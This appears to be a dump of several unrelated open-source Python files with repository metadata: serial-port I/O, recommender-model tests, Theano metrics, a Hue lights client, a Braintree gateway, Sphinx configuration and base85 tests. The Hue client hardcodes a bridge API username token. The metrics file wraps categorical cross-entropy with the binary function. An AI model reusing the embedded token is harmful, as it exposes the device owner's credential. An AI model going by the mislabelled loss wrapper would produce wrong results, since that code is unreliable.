win32.GetOverlappedResult(self._port_handle, ctypes.byref(self._overlapped_read), ctypes.byref(rc), True)
read = buf.raw[:rc.value]
else:
read = bytes()
return bytes(read)
def write(self, data):
"""Output the given byte string over the serial port."""
if not self._port_handle:
raise portNotOpenError
#~ if not isinstance(data, (bytes, bytearray)):
#~ raise TypeError('expected %s or bytearray, got %s' % (bytes, type(data)))
# convert data (needed in case of memoryview instance: Py 3.1 io lib), ctypes doesn't like memoryview
data = to_bytes(data)
if data:
#~ win32event.ResetEvent(self._overlapped_write.hEvent)
n = win32.DWORD()
err = win32.WriteFile(self._port_handle, data, len(data), ctypes.byref(n), self._overlapped_write)
if not err and win32.GetLastError() != win32.ERROR_IO_PENDING:
raise SerialException("WriteFile failed (%r)" % ctypes.WinError())
if self._write_timeout != 0: # if blocking (None) or w/ write timeout (>0)
# Wait for the write to complete.
#~ win32.WaitForSingleObject(self._overlapped_write.hEvent, win32.INFINITE)
err = win32.GetOverlappedResult(self._port_handle, self._overlapped_write, ctypes.byref(n), True)
if n.value != len(data):
raise writeTimeoutError
return n.value
else:
return 0
def flush(self):
"""\
Flush of file like objects. In this case, wait until all data
is written.
"""
while self.out_waiting:
time.sleep(0.05)
# XXX could also use WaitCommEvent with mask EV_TXEMPTY, but it would
# require overlapped IO and its also only possible to set a single mask
# on the port---
def reset_input_buffer(self):
"""Clear input buffer, discarding all that is in the buffer."""
if not self._port_handle:
raise portNotOpenError
win32.PurgeComm(self._port_handle, win32.PURGE_RXCLEAR | win32.PURGE_RXABORT)
def reset_output_buffer(self):
"""\
Clear output buffer, aborting the current output and discarding all
that is in the buffer.
"""
if not self._port_handle:
raise portNotOpenError
win32.PurgeComm(self._port_handle, win32.PURGE_TXCLEAR | win32.PURGE_TXABORT)
def _update_break_state(self):
"""Set break: Controls TXD. When active, to transmitting is possible."""
if not self._port_handle:
raise portNotOpenError
if self._break_state:
win32.SetCommBreak(self._port_handle)
else:
win32.ClearCommBreak(self._port_handle)
def _update_rts_state(self):
"""Set terminal status line: Request To Send"""
if self._rts_state:
win32.EscapeCommFunction(self._port_handle, win32.SETRTS)
else:
win32.EscapeCommFunction(self._port_handle, win32.CLRRTS)
def _update_dtr_state(self):
"""Set terminal status line: Data Terminal Ready"""
if self._dtr_state:
win32.EscapeCommFunction(self._port_handle, win32.SETDTR)
else:
win32.EscapeCommFunction(self._port_handle, win32.CLRDTR)
def _GetCommModemStatus(self):
if not self._port_handle:
raise portNotOpenError
stat = win32.DWORD()
win32.GetCommModemStatus(self._port_handle, ctypes.byref(stat))
return stat.value
@property
def cts(self):
"""Read terminal status line: Clear To Send"""
return win32.MS_CTS_ON & self._GetCommModemStatus() != 0
@property
def dsr(self):
"""Read terminal status line: Data Set Ready"""
return win32.MS_DSR_ON & self._GetCommModemStatus() != 0
@property
def ri(self):
"""Read terminal status line: Ring Indicator"""
return win32.MS_RING_ON & self._GetCommModemStatus() != 0
@property
def cd(self):
"""Read terminal status line: Carrier Detect"""
return win32.MS_RLSD_ON & self._GetCommModemStatus() != 0
# - - platform specific - - - -
def set_buffer_size(self, rx_size=4096, tx_size=None):
"""\
Recommend a buffer size to the driver (device driver can ignore this
value). Must be called before the port is opended.
"""
if tx_size is None:
tx_size = rx_size
win32.SetupComm(self._port_handle, rx_size, tx_size)
def set_output_flow_control(self, enable=True):
"""\
Manually control flow - when software flow control is enabled.
This will do the same as if XON (true) or XOFF (false) are received
from the other device and control the transmission accordingly.
WARNING: this function is not portable to different platforms!
"""
if not self._port_handle:
raise portNotOpenError
if enable:
win32.EscapeCommFunction(self._port_handle, win32.SETXON)
else:
win32.EscapeCommFunction(self._port_handle, win32.SETXOFF)
@property
def out_waiting(self):
"""Return how many bytes the in the outgoing buffer"""
flags = win32.DWORD()
comstat = win32.COMSTAT()
if not win32.ClearCommError(self._port_handle, ctypes.byref(flags), ctypes.byref(comstat)):
raise SerialException('call to ClearCommError failed')
return comstat.cbOutQue
# Nur Testfunktion!!
if __name__ == '__main__':
import sys
s = Serial(0)
sys.stdout.write("%s\n" % s)
s = Serial()
sys.stdout.write("%s\n" % s)
s.baudrate = 19200
s.databits = 7
s.close()
s.port = 0
s.open()
sys.stdout.write("%s\n" % s)
|
martinohanlon/microbit-micropython
|
examples/mcfly/serial/serialwin32.py
|
Python
|
mit
| 18,300
|
# -*- coding: utf-8 -*-
from IPython.core.display import Javascript, HTML, display_javascript, display_html
def setup_notebook():
# assign text/x-c++src MIME type to pybind11 cells
code = """
require(['notebook/js/codecell'], function(cc) {
cc.CodeCell.options_default.highlight_modes['magic_text/x-c++src'] =
{reg: [/^\s*%%pybind11/]};
});
"""
display_javascript(Javascript(data=code))
# assign non-black colour to C/C++ keywords
html = """
<style>
.cm-s-ipython span.cm-variable-3 {
color: #208ffb;
font-weight: bold;
}
</style>
"""
display_html(HTML(data=html))
|
aldanor/ipybind
|
ipybind/notebook.py
|
Python
|
mit
| 661
|
import os
import shutil
import tempfile
import numpy as np
import pytest
import torch
from spotlight.cross_validation import random_train_test_split
from spotlight.datasets import movielens
from spotlight.evaluation import mrr_score, sequence_mrr_score
from spotlight.evaluation import rmse_score
from spotlight.factorization.explicit import ExplicitFactorizationModel
from spotlight.factorization.implicit import ImplicitFactorizationModel
from spotlight.sequence.implicit import ImplicitSequenceModel
from spotlight.sequence.representations import CNNNet
RANDOM_STATE = np.random.RandomState(42)
CUDA = bool(os.environ.get('SPOTLIGHT_CUDA', False))
def _reload(model):
dirname = tempfile.mkdtemp()
try:
fname = os.path.join(dirname, "model.pkl")
torch.save(model, fname)
model = torch.load(fname)
finally:
shutil.rmtree(dirname)
return model
@pytest.fixture(scope="module")
def data():
interactions = movielens.get_movielens_dataset('100K')
train, test = random_train_test_split(interactions,
random_state=RANDOM_STATE)
return train, test
def test_explicit_serialization(data):
train, test = data
model = ExplicitFactorizationModel(loss='regression',
n_iter=3,
batch_size=1024,
learning_rate=1e-3,
l2=1e-5,
use_cuda=CUDA)
model.fit(train)
rmse_original = rmse_score(model, test)
rmse_recovered = rmse_score(_reload(model), test)
assert rmse_original == rmse_recovered
def test_implicit_serialization(data):
train, test = data
model = ImplicitFactorizationModel(loss='bpr',
n_iter=3,
batch_size=1024,
learning_rate=1e-2,
l2=1e-6,
use_cuda=CUDA)
model.fit(train)
mrr_original = mrr_score(model, test, train=train).mean()
mrr_recovered = mrr_score(_reload(model), test, train=train).mean()
assert mrr_original == mrr_recovered
def test_implicit_sequence_serialization(data):
train, test = data
train = train.to_sequence(max_sequence_length=128)
test = test.to_sequence(max_sequence_length=128)
model = ImplicitSequenceModel(loss='bpr',
representation=CNNNet(train.num_items,
embedding_dim=32,
kernel_width=3,
dilation=(1, ),
num_layers=1),
batch_size=128,
learning_rate=1e-1,
l2=0.0,
n_iter=5,
random_state=RANDOM_STATE,
use_cuda=CUDA)
model.fit(train)
mrr_original = sequence_mrr_score(model, test).mean()
mrr_recovered = sequence_mrr_score(_reload(model), test).mean()
assert mrr_original == mrr_recovered
|
maciejkula/spotlight
|
tests/test_serialization.py
|
Python
|
mit
| 3,374
|
import theano, theano.tensor as T
import numpy as np
import pandas as pd
import lasagne
"""
note: we are following the sklearn api for metrics/loss functions,
where the first arg for a function is y true, and second value is
y predicted. this is the opposite of the theano functions, so just
keep in mind.
"""
#copy existing code and place in tmetrics namespace
multiclass_hinge_loss = lambda yt, yp: lasagne.objectives.multiclass_hinge_loss(yp, yt)
squared_error = lambda yt, yp: lasagne.objectives.squared_error(yp, yt)
binary_accuracy = lambda yt, yp: lasagne.objectives.binary_accuracy(yp, yt)
categorical_accuracy = lambda yt, yp: lasagne.objectives.categorical_accuracy(yp, yt)
def binary_crossentropy(y_true, y_predicted):
"""
wrapper of theano.tensor.nnet.binary_crossentropy
args reversed to match tmetrics api
"""
return T.nnet.binary_crossentropy(y_predicted, y_true)
def categorical_crossentropy(y_true, y_predicted):
"""
wrapper of theano.tensor.nnet.categorical_crossentropy
args reversed to match tmetrics api
"""
return T.nnet.binary_crossentropy(y_predicted, y_true)
def binary_hinge_loss(y_true, y_predicted, binary=True, delta=1):
"""
wrapper of lasagne.objectives.binary_hinge_loss
args reversed to match tmetrics api
"""
return lasagne.objectives.binary_hinge_loss(y_predicted, y_true, binary, delta)
def brier_score_loss(y_true, y_predicted, sample_weight=None):
"""
port of sklearn.metrics.brier_score_loss
works for 2D binary data as well, e.g.
y_true: [[0, 1, 0],
[1, 0, 0]]
y_predicted: [[.1, .9, .3],
[.4, .7, .2]]
y_true: tensor, y true (binary)
y_predicted: tensor, y predicted (float between 0 and 1)
sample_weight: tensor or None (standard mean)
assumptions:
-binary ground truth values ({0, 1}); no pos_label
training wheels like sklearn or figuring out how to
run this on text labels.
-probabilities are floats between 0-1
-sample_weight broadcasts to ((y_true - y_predicted) ** 2)
"""
scores = ((y_true - y_predicted) ** 2)
if sample_weight is not None:
scores = scores * sample_weight
return scores.mean()
def hamming_loss(y_true, y_predicted):
"""
note - works on n-dim arrays, means across the final axis
note - we round predicted because float probabilities would not work
"""
return T.neq(y_true, T.round(y_predicted)).astype(theano.config.floatX).mean(axis=-1)
def jaccard_similarity(y_true, y_predicted):
"""
y_true: tensor ({1, 0})
y_predicted: tensor ({1, 0})
note - we round predicted because float probabilities would not work
"""
y_predicted = T.round(y_predicted).astype(theano.config.floatX)
either_nonzero = T.or_(T.neq(y_true, 0), T.neq(y_predicted, 0))
return T.and_(T.neq(y_true, y_predicted), either_nonzero).sum(axis=-1, dtype=theano.config.floatX) / either_nonzero.sum(axis=-1, dtype=theano.config.floatX)
def _nbool_correspond_all(u, v):
"""
port of scipy.spatial.distance._nbool_correspond_all
with dtype assumed to be integer/float (no bool in theano)
sums are on last axis
"""
not_u = 1.0 - u
not_v = 1.0 - v
nff = (not_u * not_v).sum(axis=-1, dtype=theano.config.floatX)
nft = (not_u * v).sum(axis=-1, dtype=theano.config.floatX)
ntf = (u * not_v).sum(axis=-1, dtype=theano.config.floatX)
ntt = (u * v).sum(axis=-1, dtype=theano.config.floatX)
return (nff, nft, ntf, ntt)
def kulsinski_similarity(y_true, y_predicted):
y_predicted = T.round(y_predicted)
nff, nft, ntf, ntt = _nbool_correspond_all(y_true, y_predicted)
n = y_true.shape[0].astype('float32')
return (ntf + nft - ntt + n) / (ntf + nft + n)
def trapz(y, x=None, dx=1.0, axis=-1):
"""
reference implementation: numpy.trapz
---------
Integrate along the given axis using the composite trapezoidal rule.
Integrate `y` (`x`) along given axis.
Parameters
----------
y : array_like
Input array to integrate.
x : array_like, optional
If `x` is None, then spacing between all `y` elements is `dx`.
dx : scalar, optional
If `x` is None, spacing given by `dx` is assumed. Default is 1.
axis : int, optional
Specify the axis.
Returns
-------
trapz : float
Definite integral as approximated by trapezoidal rule.
See Also
--------
sum, cumsum
Notes
-----
Image [2]_ illustrates trapezoidal rule -- y-axis locations of points
will be taken from `y` array, by default x-axis distances between
points will be 1.0, alternatively they can be provided with `x` array
or with `dx` scalar. Return value will be equal to combined area under
the red lines.
References
----------
.. [1] Wikipedia page: http://en.wikipedia.org/wiki/Trapezoidal_rule
.. [2] Illustration image:
http://en.wikipedia.org/wiki/File:Composite_trapezoidal_rule_illustration.png
Examples
--------
>>> np.trapz([1,2,3])
4.0
>>> np.trapz([1,2,3], x=[4,6,8])
8.0
>>> np.trapz([1,2,3], dx=2)
8.0
>>> a = np.arange(6).reshape(2, 3)
>>> a
array([[0, 1, 2],
[3, 4, 5]])
>>> np.trapz(a, axis=0)
array([ 1.5, 2.5, 3.5])
>>> np.trapz(a, axis=1)
array([ 2., 8.])
"""
if x is None:
d = dx
else:
if x.ndim == 1:
d = T.extra_ops.diff(x)
# reshape to correct shape
shape = T.ones(y.ndim, dtype='int8')
shape = T.set_subtensor(shape[axis], d.shape[0])
d = d.reshape(shape)
else:
d = T.extra_ops.diff(x, axis=axis)
nd = y.ndim
slice1 = [slice(None)]*nd
slice2 = [slice(None)]*nd
slice1[axis] = slice(1, None)
slice2[axis] = slice(None, -1)
return (d * (y[slice1] + y[slice2]) / 2.0).sum(axis)
def auc(x, y):
return abs(trapz(y, x))
#def roc_curve(y_true, y_predicted):
# fps, tps, thresholds = _binary_clf_curve(y_true, y_predicted)
# fpr = fps.astype('float32') / fps[-1]
# tpr = tps.astype('float32') / tps[-1]
# return fpr, tpr, thresholds
#
#def roc_auc_score(y_true, y_predicted):
# fpr, tpr, thresholds = roc_curve(y_true, y_predicted)
# return auc(fpr, tpr)
def _last_axis_binary_clf_curve(y_true, y_predicted):
"""
returns y_predicted.shape[-2] binary clf curves calculated axis[-1]-wise
this is a numpy implementation
"""
assert y_true.shape == y_predicted.shape
axis = -1
sort_idx = list(np.ogrid[[slice(x) for x in y_predicted.shape]])
sort_idx[axis] = y_predicted.argsort(axis=axis).astype('int8')
reverse = [slice(None)] * y_predicted.ndim
reverse[axis] = slice(None, None, -1)
sorted_y_predicted = y_predicted[sort_idx][reverse]
sorted_y_true = y_true[sort_idx][reverse]
tps = sorted_y_true.cumsum(axis=axis)
count = (np.ones(y_predicted.shape) * np.arange(y_predicted.shape[-1]))
fps = 1 + count - tps
threshold_values = sorted_y_predicted
return fps, tps, threshold_values
def last_axis_roc_curve(y_true, y_predicted):
"numpy implementation"
fps, tps, thresholds = _last_axis_binary_clf_curve(y_true, y_predicted)
i = [slice(None)] * fps.ndim
i[-1] = -1
fpr = fps.astype('float32') / np.expand_dims(fps[i], axis=-1)
tpr = tps.astype('float32') / np.expand_dims(tps[i], axis=-1)
#tpr = tps.astype('float32') / tps[i][:, np.newaxis]
return fpr, tpr, thresholds
def last_axis_roc_auc_scores(y_true, y_predicted):
fpr, tpr, _ = last_axis_roc_curve(y_true, y_predicted)
return np.trapz(tpr, fpr)
def _vector_clf_curve(y_true, y_predicted):
"""
sklearn.metrics._binary_clf_curve port
y_true: tensor (vector): y true
y_predicted: tensor (vector): y predicted
returns: fps, tps, threshold_values
fps: tensor (vector): false positivies
tps: tensor (vector): true positives
threshold_values: tensor (vector): value of y predicted at each threshold
along the curve
restrictions:
-not numpy compatible
-only works with two vectors (not matrix or tensor)
"""
assert y_true.ndim == y_predicted.ndim == 1
desc_score_indices = y_predicted.argsort()[::-1].astype('int8')
sorted_y_predicted = y_predicted[desc_score_indices]
sorted_y_true = y_true[desc_score_indices]
distinct_value_indices = (1-T.isclose(T.extra_ops.diff(sorted_y_predicted), 0)).nonzero()[0]
curve_cap = T.extra_ops.repeat(sorted_y_predicted.size - 1, 1)
threshold_indices = T.concatenate([distinct_value_indices, curve_cap]).astype('int8')
tps = T.extra_ops.cumsum(sorted_y_true[threshold_indices])
fps = 1 + threshold_indices - tps
threshold_values = sorted_y_predicted[threshold_indices]
return fps, tps, threshold_values
def _matrix_clf_curve(y_true, y_predicted):
assert y_true.ndim == y_predicted.ndim == 2
row_i = T.arange(y_true.shape[0], dtype='int8').dimshuffle(0, 'x')
col_i = y_predicted.argsort().astype('int8')
reverse = [slice(None), slice(None, None, -1)]
y_true = y_true[row_i, col_i][reverse]
y_predicted = y_predicted[row_i, col_i][reverse]
tps = y_true.cumsum(axis=-1)
counts = T.ones_like(y_true) * T.arange(y_predicted.shape[-1], dtype='int8')
fps = 1 + counts - tps
return fps, tps, y_predicted
def _tensor3_clf_curve(y_true, y_predicted):
assert y_true.ndim == y_predicted.ndim == 3
x_i = T.arange(y_true.shape[0], dtype='int8').dimshuffle(0, 'x', 'x')
y_i = T.arange(y_true.shape[1], dtype='int8').dimshuffle('x', 0, 'x')
z_i = y_predicted.argsort().astype('int8')
reverse = [slice(None), slice(None), slice(None, None, -1)]
y_true = y_true[x_i, y_i, z_i][reverse]
y_predicted = y_predicted[x_i, y_i, z_i][reverse]
tps = y_true.cumsum(axis=-1)
counts = T.ones_like(y_true) * T.arange(y_predicted.shape[-1], dtype='int8')
fps = 1 + counts - tps
return fps, tps, y_predicted
def _tensor4_clf_curve(y_true, y_predicted):
assert y_true.ndim == y_predicted.ndim == 4
a_i = T.arange(y_true.shape[0], dtype='int8').dimshuffle(0, 'x', 'x', 'x')
b_i = T.arange(y_true.shape[1], dtype='int8').dimshuffle('x', 0, 'x', 'x')
c_i = T.arange(y_true.shape[2], dtype='int8').dimshuffle('x', 'x', 0, 'x')
d_i = y_predicted.argsort().astype('int8')
reverse = [slice(None), slice(None), slice(None), slice(None, None, -1)]
y_true = y_true[a_i, b_i, c_i, d_i][reverse]
y_predicted = y_predicted[a_i, b_i, c_i, d_i][reverse]
tps = y_true.cumsum(axis=-1)
counts = T.ones_like(y_true) * T.arange(y_predicted.shape[-1], dtype='int8')
fps = 1 + counts - tps
return fps, tps, y_predicted
def _binary_clf_curves(y_true, y_predicted):
"""
returns curves calculated axis[-1]-wise
note - despite trying several approaches, could not seem to get a
n-dimensional verision of clf_curve to work, so abandoning. 2,3,4 is fine.
"""
if not (y_true.ndim == y_predicted.ndim):
raise ValueError('Dimension mismatch, ({}, {})'.format(y_true.ndim, y_predicted.ndim))
if not isinstance(y_true, T.TensorVariable) or not isinstance(y_predicted, T.TensorVariable):
raise TypeError('This only works for symbolic variables.')
if y_true.ndim == 1:
clf_curve_fn = _vector_clf_curve
elif y_true.ndim == 2:
clf_curve_fn = _matrix_clf_curve
elif y_true.ndim == 3:
clf_curve_fn = _tensor3_clf_curve
elif y_true.ndim == 4:
clf_curve_fn = _tensor4_clf_curve
else:
raise NotImplementedError('Not implemented for ndim {}'.format(y_true.ndim))
fps, tps, thresholds = clf_curve_fn(y_true, y_predicted)
return fps, tps, thresholds
def _last_col_idx(ndim):
last_col = [slice(None) for x in xrange(ndim)]
last_col[-1] = -1
return last_col
def _reverse_idx(ndim):
reverse = [slice(None) for _ in range(ndim-1)]
reverse.append(slice(None, None, -1))
return reverse
def roc_curves(y_true, y_predicted):
"returns roc curves calculated axis -1-wise"
fps, tps, thresholds = _binary_clf_curves(y_true, y_predicted)
last_col = _last_col_idx(y_true.ndim)
fpr = fps.astype('float32') / T.shape_padright(fps[last_col], 1)
tpr = tps.astype('float32') / T.shape_padright(tps[last_col], 1)
return fpr, tpr, thresholds
def roc_auc_scores(y_true, y_predicted):
"roc auc scores calculated axis -1-wise"
fpr, tpr, thresholds = roc_curves(y_true, y_predicted)
return auc(fpr, tpr)
def roc_auc_loss(y_true, y_predicted):
return 1-roc_auc_scores(y_true, y_predicted)
def precision_recall_curves(y_true, y_predicted):
"precision recall curves calculated axis -1-wise"
fps, tps, thresholds = _binary_clf_curves(y_true, y_predicted)
last_col = _last_col_idx(y_true.ndim)
last_col[-1] = np.asarray([-1], dtype='int8')
precision = tps.astype('float32') / (tps + fps)
if y_true.ndim == 1:
recall = tps.astype('float32') / tps[-1]
else:
recall = tps.astype('float32') / tps[last_col]
reverse = _reverse_idx(fps.ndim)
precision = precision[reverse]
recall = recall[reverse]
thresholds = thresholds[reverse]
if y_true.ndim == 1:
ones, zeros = np.asarray([1], dtype='float32'), np.asarray([0], dtype='float32')
else:
ones = T.ones_like(precision)[last_col]
zeros = T.zeros_like(recall)[last_col]
precision = T.concatenate([precision, ones], axis=-1)
recall = T.concatenate([recall, zeros], axis=-1)
return precision, recall, thresholds
def average_precision_scores(y_true, y_predicted):
precision, recall, _ = precision_recall_curves(y_true, y_predicted)
return auc(recall, precision)
def precision_recall_loss(y_true, y_predicted):
"convenience function to minimize for"
return 1-average_precision_scores(y_true, y_predicted)
def last_axis_precision_recall_curve(y_true, y_predicted):
fps, tps, thresholds = _last_axis_binary_clf_curve(y_true, y_predicted)
i = [slice(None)] * fps.ndim
i[-1] = [-1]
precision = tps.astype('float32') / (tps + fps)
recall = tps.astype('float32') / tps[i]
i[-1] = slice(None, None, -1)
precision = precision[i]
recall = recall[i]
thresholds = thresholds[i]
i[-1] = [-1]
precision = np.concatenate([precision, np.ones(precision.shape)[i]], axis=-1)
recall = np.concatenate([recall, np.zeros(recall.shape)[i]], axis=-1)
return precision, recall, thresholds
#aliases
roc_curve = roc_curves
roc_auc_score = roc_auc_scores
precision_recall_curve = precision_recall_curves
average_precision_score = average_precision_scores
_binary_clf_curve = _binary_clf_curves
|
jonathanstrong/tmetrics
|
tmetrics/classification.py
|
Python
|
mit
| 14,853
|
import os
import unittest
import numpy as np
from tfsnippet.examples.utils import MLResults
from tfsnippet.utils import TemporaryDirectory
def head_of_file(path, n):
with open(path, 'rb') as f:
return f.read(n)
class MLResultTestCase(unittest.TestCase):
def test_imwrite(self):
with TemporaryDirectory() as tmpdir:
results = MLResults(tmpdir)
im = np.zeros([32, 32], dtype=np.uint8)
im[16:, ...] = 255
results.save_image('test.bmp', im)
file_path = os.path.join(tmpdir, 'test.bmp')
self.assertTrue(os.path.isfile(file_path))
self.assertEqual(head_of_file(file_path, 2), b'\x42\x4d')
results.save_image('test.png', im)
file_path = os.path.join(tmpdir, 'test.png')
self.assertTrue(os.path.isfile(file_path))
self.assertEqual(head_of_file(file_path, 8),
b'\x89\x50\x4e\x47\x0d\x0a\x1a\x0a')
results.save_image('test.jpg', im)
file_path = os.path.join(tmpdir, 'test.jpg')
self.assertTrue(os.path.isfile(file_path))
self.assertEqual(head_of_file(file_path, 3), b'\xff\xd8\xff')
|
korepwx/tfsnippet
|
tests/examples/utils/test_mlresult.py
|
Python
|
mit
| 1,216
|
import logging
import requests
HUE_IP = '192.168.86.32'
HUE_USERNAME = '7KcxItfntdF0DuWV9t0GPMeToEBlvHTgqWNZqxu6'
logger = logging.getLogger('hue')
def getLights():
url = 'http://{0}/api/{1}/lights'.format(HUE_IP, HUE_USERNAME)
try:
r = requests.get(url)
except:
logger.error('Failed getting status for all lights')
return
if r.status_code == 200:
data = r.json()
return data
def getStatus(id):
url = 'http://{0}/api/{1}/lights/{2}'.format(HUE_IP, HUE_USERNAME, id)
try:
r = requests.get(url)
except:
logger.error('Failed getting status for light {0}'.format (id))
return
if r.status_code == 200:
data = r.json()
return data
|
twotymz/lucy
|
hue/lights.py
|
Python
|
mit
| 705
|
import re
import braintree
from braintree.address import Address
from braintree.error_result import ErrorResult
from braintree.exceptions.not_found_error import NotFoundError
from braintree.resource import Resource
from braintree.successful_result import SuccessfulResult
class AddressGateway(object):
def __init__(self, gateway):
self.gateway = gateway
self.config = gateway.config
def create(self, params={}):
Resource.verify_keys(params, Address.create_signature())
if not "customer_id" in params:
raise KeyError("customer_id must be provided")
if not re.search("\A[0-9A-Za-z_-]+\Z", params["customer_id"]):
raise KeyError("customer_id contains invalid characters")
response = self.config.http().post("/customers/" + params.pop("customer_id") + "/addresses", {"address": params})
if "address" in response:
return SuccessfulResult({"address": Address(self.gateway, response["address"])})
elif "api_error_response" in response:
return ErrorResult(self.gateway, response["api_error_response"])
def delete(self, customer_id, address_id):
self.config.http().delete("/customers/" + customer_id + "/addresses/" + address_id)
return SuccessfulResult()
def find(self, customer_id, address_id):
try:
response = self.config.http().get("/customers/" + customer_id + "/addresses/" + address_id)
return Address(self.gateway, response["address"])
except NotFoundError:
raise NotFoundError("address for customer " + customer_id + " with id " + address_id + " not found")
def update(self, customer_id, address_id, params={}):
Resource.verify_keys(params, Address.update_signature())
response = self.config.http().put(
"/customers/" + customer_id + "/addresses/" + address_id,
{"address": params}
)
if "address" in response:
return SuccessfulResult({"address": Address(self.gateway, response["address"])})
elif "api_error_response" in response:
return ErrorResult(self.gateway, response["api_error_response"])
|
eldarion/braintree_python
|
braintree/address_gateway.py
|
Python
|
mit
| 2,190
|
# -*- coding: utf-8 -*-
#
# Configuration file for the Sphinx documentation builder.
#
# This file does only contain a selection of the most common options. For a
# full list see the documentation:
# http://www.sphinx-doc.org/en/master/config
# -- Path setup --------------------------------------------------------------
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
# import os
# import sys
# sys.path.insert(0, os.path.abspath('.'))
# -- Project information -----------------------------------------------------
project = 'msgiver'
copyright = '2018, Tatsunori Nishikori'
author = 'Tatsunori Nishikori'
# The short X.Y version
version = '0.1'
# The full version, including alpha/beta/rc tags
release = '0.1.7.1'
# -- General configuration ---------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.coverage',
'sphinx.ext.githubpages',
]
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
#
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The master toctree document.
master_doc = 'index'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This pattern also affects html_static_path and html_extra_path .
exclude_patterns = ['build', 'Thumbs.db', '.DS_Store']
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# -- Options for HTML output -------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme = 'alabaster'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#
# html_theme_options = {}
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Custom sidebar templates, must be a dictionary that maps document names
# to template names.
#
# The default sidebars (for documents that don't match any pattern) are
# defined by theme itself. Builtin themes are using these templates by
# default: ``['localtoc.html', 'relations.html', 'sourcelink.html',
# 'searchbox.html']``.
#
# html_sidebars = {}
# -- Options for HTMLHelp output ---------------------------------------------
# Output file base name for HTML help builder.
htmlhelp_basename = 'msgiverdoc'
# -- Options for LaTeX output ------------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#
# 'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#
# 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#
# 'preamble': '',
# Latex figure (float) alignment
#
# 'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'msgiver.tex', 'msgiver Documentation',
'Tatsunori Nishikori', 'manual'),
]
# -- Options for manual page output ------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'msgiver', 'msgiver Documentation',
[author], 1)
]
# -- Options for Texinfo output ----------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'msgiver', 'msgiver Documentation',
author, 'msgiver', 'One line description of project.',
'Miscellaneous'),
]
|
kitaro-tn/msgiver
|
_docs/conf.py
|
Python
|
mit
| 4,844
|
# -*- coding: utf-8 -*-
from anima.render.arnold import base85
import unittest
import struct
class Base85TestCase(unittest.TestCase):
"""tests the base85 module
"""
def setup(self):
"""setup the test
"""
pass
def test_arnold_b85_encode_is_working_properly(self):
"""testing if arnold_b85_encode is working properly
"""
raw_data = [
struct.pack('f', 2),
struct.pack('f', 3.484236717224121),
]
encoded_data = [
'8TFfd',
'8^RH(',
]
for i in range(len(raw_data)):
self.assertEqual(
encoded_data[i],
base85.arnold_b85_encode(raw_data[i])
)
def test_arnold_b85_encode_packs_zeros_properly(self):
"""testing if arnold_b85_encode is packing zeros properly
"""
raw_data = [
struct.pack('f', 0.0),
struct.pack('ffff', 0.0, 0.0, 3.484236717224121, 0.0)
]
encoded_data = [
'z',
'zz8^RH(z'
]
for i in range(len(raw_data)):
self.assertEqual(
encoded_data[i],
base85.arnold_b85_encode(raw_data[i])
)
def test_arnold_b85_encode_packs_ones_properly(self):
"""testing if arnold_b85_encode is packing ones properly
"""
raw_data = [
struct.pack('f', 1.0),
struct.pack('ffff', 1.0, 1.0, 3.484236717224121, 1.0)
]
encoded_data = [
'y',
'yy8^RH(y'
]
for i in range(len(raw_data)):
self.assertEqual(
encoded_data[i],
base85.arnold_b85_encode(raw_data[i])
)
def test_arnold_b85_decode_is_working_properly(self):
"""testing if arnold_b85_decode is working properly
"""
raw_data = [
struct.pack('f', 2),
struct.pack('f', 3.484236717224121),
]
encoded_data = [
'8TFfd',
'8^RH(',
]
for i in range(len(raw_data)):
self.assertEqual(
raw_data[i],
base85.arnold_b85_decode(encoded_data[i])
)
def test_arnold_b85_decode_unpacks_zeros_properly(self):
"""testing if arnold_b85_decode is unpacking zeros properly
"""
raw_data = [
struct.pack('f', 0.0),
struct.pack('ffff', 0.0, 0.0, 3.484236717224121, 0.0)
]
encoded_data = [
'z',
'zz8^RH(z'
]
for i in range(len(raw_data)):
self.assertEqual(
raw_data[i],
base85.arnold_b85_decode(encoded_data[i])
)
def test_arnold_b85_decode_unpacks_ones_properly(self):
"""testing if arnold_b85_decode is unpacking zeros properly
"""
raw_data = [
struct.pack('f', 1.0),
struct.pack('ffff', 1.0, 1.0, 3.484236717224121, 1.0)
]
encoded_data = [
'y',
'yy8^RH(y'
]
for i in range(len(raw_data)):
self.assertEqual(
raw_data[i],
base85.arnold_b85_decode(encoded_data[i])
)
def test_arnold_b85_encoding_real_world_data(self):
"""testing encoding with some real world data
"""
# b85UINT
raw_data = [0, 1, 9, 8, 1, 2, 10, 9, 2, 3, 11, 10, 3, 4, 12, 11, 4, 5,
13, 12, 5, 6, 14, 13, 6, 7, 15, 14]
encoded_data = "&UOP6&psb:'7Bt>'Rg1B'n6CF(4ZUJ(P)gN"
data_format = '%sB' % len(raw_data)
self.assertEqual(
encoded_data,
